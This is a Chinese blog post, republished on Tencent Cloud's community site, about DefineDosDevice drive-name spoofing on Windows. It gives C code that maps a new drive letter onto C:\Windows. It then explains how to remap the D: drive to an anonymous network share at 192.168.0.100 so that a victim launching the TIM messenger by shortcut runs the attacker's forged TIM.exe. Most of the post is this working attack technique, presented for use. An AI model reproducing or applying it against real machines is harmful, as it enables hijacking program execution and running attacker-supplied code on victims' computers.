前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >DefineDosDevice设备名欺骗

DefineDosDevice设备名欺骗

作者头像
Pulsar-V
发布2019-03-12 17:05:46
8660
发布2019-03-12 17:05:46
举报
文章被收录于专栏:Pulsar-VPulsar-V

首先来Windows下编译运行下面这一段代码

代码语言:javascript
复制
#include "windows.h"
#include<stdio.h>
int main()
{
    BOOL ret;
    ret=DefineDosDeviceA(DDD_RAW_TARGET_PATH,"P:","\\GLOBAL??\\C:\\Windows");
    //ret=DefineDosDeviceA(DDD_REMOVE_DEFINITION,"P:",NULL);
    printf("%d",ret);
    return 0;
}

运行完毕以后输出1运行成功,可以看到我的电脑里面多了一个磁盘驱动器P

打开驱动器P直接进入了C:\Windows目录下,说明磁盘映射成功 接下来可以发挥一下你的想象力 以TIM QQ为例TIM路径为D:\Program Files (x86)\Tencent\TIM\Bin 在内网搭建一个共享文件夹路径为Program Files (x86)\Tencent\TIM\Bin让内网计算机可以匿名访问,并且覆盖原有的磁盘名称D,这里我的主机IP是192.168.0.100

代码语言:javascript
复制
DefineDosDevice(DDD_RAW_TARGET_PATH,"D:","\\\\192.168.0.100\\Program Files (x86)\Tencent\TIM\Bin")

接下来编译代码,当远程主机执行快捷方式打开TIM的时候,就会被虚拟磁盘驱动器重定向到\\\\192.168.0.100\\Program Files (x86)\\Tencent\\TIM\\Bin执行你的伪造的TIM.exe文件,达到攻击目的。

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2018/07/06 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档